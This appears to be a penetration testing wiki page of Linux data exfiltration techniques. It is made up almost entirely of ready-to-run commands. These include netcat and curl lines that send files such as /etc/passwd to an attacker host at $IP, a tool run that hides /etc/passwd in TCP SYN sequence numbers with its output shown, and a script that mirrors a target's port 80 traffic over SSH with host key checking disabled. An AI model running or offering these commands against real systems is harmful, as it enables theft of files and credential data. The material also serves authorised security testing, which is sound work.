Data Exfiltration

Penetration Testing Wiki

Data Exfiltration in Linux

Raw data exfiltration through port 443

On target machine:

nc -nvv $IP 443 < input.txt

On attacker machine:

nc -nvlp 443 > input.txt

HTTP POST data exfiltration through port 8080

On target machine:

curl -T /etc/passwd http://$IP:8080

On attacker machine:

nc -nvlp 8080 | tee passwd


Data exfiltration using TCP SYN

We can use TCP SYN sequence number packets to exfiltrate data:

$ ./syn-file -i eth0 -d 192.168.1.158 -f /etc/passwd -p 8080 -P 8081 -m 00:0C:0A:4a:3b:5c
using interface: eth0
#1	 [Read from file "at:x"] [Encoded SEQ #: 0x61743a78] [Wrote 74 bytes]
#2	 [Read from file ":25:"] [Encoded SEQ #: 0x3a32353a] [Wrote 74 bytes]
#3	 [Read from file "25:B"] [Encoded SEQ #: 0x32353a42] [Wrote 74 bytes]
#4	 [Read from file "atch"] [Encoded SEQ #: 0x61746368] [Wrote 74 bytes]
#5	 [Read from file " job"] [Encoded SEQ #: 0x206a6f62] [Wrote 74 bytes]
#6	 [Read from file "s da"] [Encoded SEQ #: 0x73206461] [Wrote 74 bytes]
#7	 [Read from file "emon"] [Encoded SEQ #: 0x656d6f6e] [Wrote 74 bytes]
#8	 [Read from file ":/va"] [Encoded SEQ #: 0x3a2f7661] [Wrote 74 bytes]
#9	 [Read from file "r/sp"] [Encoded SEQ #: 0x722f7370] [Wrote 74 bytes]
#10	 [Read from file "ool/"] [Encoded SEQ #: 0x6f6f6c2f] [Wrote 74 bytes]
[...]

Mirror target traffic on port 80 to a remote host

#!/bin/bash

sudo su -c "mkfifo /tmp/sharkfin"
sudo su -c "chmod 777 /tmp/sharkfin"
sudo su -c "wireshark -k -i /tmp/sharkfin &"
ssh -i ~/.ssh/id_ssh -o StrictHostKeyChecking=no -p 22 [email protected]  "tcpdump -U -s0 -w - -i eth0 'port 80'" > /tmp/sharkfin

Data Exfiltration in Windows

Look PowerShell frameworks